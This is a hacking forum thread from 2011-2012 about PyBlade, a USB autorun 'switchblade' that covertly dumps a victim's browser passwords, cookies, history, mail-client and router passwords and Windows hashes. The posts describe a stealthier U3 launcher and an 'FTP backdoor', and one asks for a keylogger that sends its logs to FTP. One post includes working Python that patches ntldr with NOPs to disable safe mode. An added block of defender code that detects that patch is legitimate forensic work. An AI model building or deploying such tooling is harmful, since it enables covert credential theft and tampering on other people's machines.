Posted 13 March 2011 - 01:13 PM
idk how the pyload is configured (or built, I haven't checked the .py files), but when I tried to run it from a random folder (on my D drive) it complained about the folder D:\logs\%pcname%%HOUR%-%MINUTES%\ that didn't exist. I can only conclude that the pyload is made to be run only from the root of a drive (that's what sablefox said in his first post I believe). **if this ain't right the rest of this part doesn't matter**
What the U3 shit does is placing it somewhere else and making it run from there. If the only reason u guys want it to be U3 is to make it autorunnable, well fine, here's a solution:
make a .BAT file that goes to the root of the drive and then runs the bex.exe (that is placed in the root of the drive), then make that bat into an .exe (bat to exe converter, google it), then convert the exe into a .u3p (PackageFactory, once again google it), then install the .u3p onto your u3 drive....
going to the root of the drive can be generally done in two ways:
.......................................(you got the point I guess)
if you got firefox password stealer problems, just get the newest version from their site....
Posted 06 June 2011 - 11:08 AM
-The system info log now shows the target's public IP address, and gets it from 5 different sources for redundancy's sake. Should be useful for accessing that FTP backdoor
-Browser passwords can all be saved in one file, one file per browser, or both
-Dumps the saved cache for IE, Chrome, and Firefox
-Dumps the saved cookies of Chrome, Firefox, and Flash (couldn't get IE working)
-Dumps the saved history for Chrome and Firefox in addition to IE
-Dumps passwords saved in popular mail clients
-Dumps password to access the victim's router (unfortunately only works on a small set of routers)
-Modified U3 support: The drive now executes FBex without launching the U3 launchpad, making it stealthier
-PWDump is the only bit of the program that isn't working on 64 bit systems
-IE Cookie Viewer doesn't save
I could not for the life of me figure out how to get PWDump working. I used sablefoxx's original code, it didn't work. I rewrote it, it didn't work. I don't know what to do. Here's an odd little note, though: whenever I compiled bex.exe using py2exe on a 64-bit system, PWDump DID work on 64-bit systems, but the entire EXE wouldn't execute on any 32-bit system ("Not a valid Win32 application" error). Whenever I compiled the .exe on a 32-bit system, all of the .exe worked on 32-bit systems, and most of it worked on 64-bit systems, but not PWDump. For now, I just disabled PWDump in the configuration file by default (you can turn it on if you know the target is running 32-bit). It could have something to do with using an out-of-date version of PWDump, but I'm too frustrated with it by now to care... Apparently this wasn't an issue for others using sablefoxx's code, so maybe it's just me...
Here is the modified U3 launcher, using Universal Customizer (Windows XP only):
Just extract the files, click the Universal Customizer application, and follow the instructions, the .iso should've already been made.
For those of you who can't run the above because you don't have XP, here is the .iso by itself:
It needs to be burned to the virtual optical drive of your U3 device.
Here is the blade, just extract to the root of the flash drive:
And finally, here's the source:
Does anyone know any open source keyloggers that send the logs to an FTP server? I included a keylogger in my blade, but I couldn't upload that version because the one I used is commercial. If there was a good open source one, that'd be a cool thing to add.
*Fwew!* Well, that certainly was a fun exercise in learning Python. Thank you for uploading the source, sablefoxx
Posted 07 June 2011 - 07:07 PM
Posted 23 June 2011 - 01:20 AM
And if you're feeling a bit evil, disable safe mode (XP/2k3):
```python
# Python 2.x Code
import os
import mmap

def patchNtldr(ntldr = 'C:\\ntldr'):
    file = open(ntldr, 'r+')
    size = os.path.getsize(ntldr)
    map = mmap.mmap(file.fileno(), size)
    map.seek(1915) # Jump to offset
    map.write_byte('\x90') # NOP Sled, whee!
    map.write_byte('\x90')
    map.write_byte('\x90')
    map.close()

if __name__ == '__main__':
    patchNtldr()
```
Edited by sablefoxx, 23 June 2011 - 01:27 AM.
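Added example, not part of the thread or of any poster's code: a defender-side integrity check for the patch in the post above, flagging an ntldr image whose three bytes at offset 1915 are 0x90 and, when a baseline is available, comparing its SHA-256 against a known-good copy. The function names, the result keys and the sample buffers are assumptions made for illustration; the thread does not give the original bytes at that offset, so the baseline hash is the stronger signal.

```python
import hashlib
from typing import Optional, Tuple

PATCH_OFFSET = 1915           # offset used by the script posted in the thread
PATCH_BYTES = b"\x90" * 3     # the three NOP bytes that script writes


def check_ntldr(data: bytes, known_good_sha256: Optional[str] = None) -> dict:
    """Inspect an ntldr image held in memory and report signs of tampering."""
    result = {"size": len(data), "nop_patch": False,
              "hash_mismatch": None, "error": None}
    window = data[PATCH_OFFSET:PATCH_OFFSET + len(PATCH_BYTES)]
    if len(window) < len(PATCH_BYTES):
        # Truncated or wrong file: report it instead of returning a false "clean".
        result["error"] = "file is shorter than the patch offset"
        return result
    result["nop_patch"] = window == PATCH_BYTES
    if known_good_sha256 is not None:
        digest = hashlib.sha256(data).hexdigest()
        result["hash_mismatch"] = digest != known_good_sha256.lower()
    return result


def check_ntldr_file(path: str, known_good_sha256: Optional[str] = None) -> dict:
    """Same check, reading the image from disk (e.g. a mounted forensic copy)."""
    with open(path, "rb") as fh:
        return check_ntldr(fh.read(), known_good_sha256)


def constructed_samples() -> Tuple[bytes, bytes]:
    """Constructed stand-ins for a clean and a patched image (not real ntldr)."""
    clean = b"\x41" * 4096
    patched = bytearray(clean)
    patched[PATCH_OFFSET:PATCH_OFFSET + 3] = PATCH_BYTES
    return clean, bytes(patched)


if __name__ == "__main__":
    clean, patched = constructed_samples()
    baseline = hashlib.sha256(clean).hexdigest()
    print(check_ntldr(clean, baseline))
    print(check_ntldr(patched, baseline))
```
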
Posted 23 June 2011 - 08:50 PM
Posted 19 July 2011 - 05:53 PM
Mubix posted the link...
Not bad as a PyBlade add-on !
I think that it would be impractical to add a memory dumping tool to a project like this. A memory dumper dumps the entire contents of the installed memory on the system. So let's say you added this onto Pyblade: your USB would then dump the entire system memory, so if the system had 8 GB of RAM, around 8 GB of data would be dumped onto your USB. For a tool like Pyblade, which is intended to be inserted into a computer and removed quickly, it would add a lot of time depending on the amount of RAM installed on the computer. Not saying that this tool is bad, I just think that it was more intended for incident response teams, as they can use dumpit on their USB without any concern for how long the data will take to copy, as long as they get their memory dump. Maybe dumpit can be added on to the incident response switchblade. Although this could very well change with USB 3.0 becoming mainstream, as we could dump the memory a lot faster. But for now I would recommend dumpit more for incident response tool/USB kits.
That's my 2 cents anyway
Posted 20 July 2011 - 05:18 AM
Just set it as an option, if you have time, an 8 GB pendrive and 4 GB of memory on the victim's computer.
Posted 19 January 2012 - 09:19 AM
Posted 03 April 2012 - 02:20 PM
This is a great piece of software. Kudos.
I have a question somewhat related to the software, but also towards windows 7.
If a user does not have admin access on a computer running windows 7 64 bit, will they be able to run this off of a USB drive?
Posted 16 April 2012 - 02:08 PM
Posted 17 April 2012 - 10:31 AM
Posted 18 April 2012 - 07:24 PM
You need to go to nirsofter's site and download the latest files in there, IEPassview and FireFoxPassView and a few others. All the files in there are probably still from when XP was in its middle stage.
So how come Pyblade 3.0 doesn't show me IE Logins/PWs even though it's on 1? =/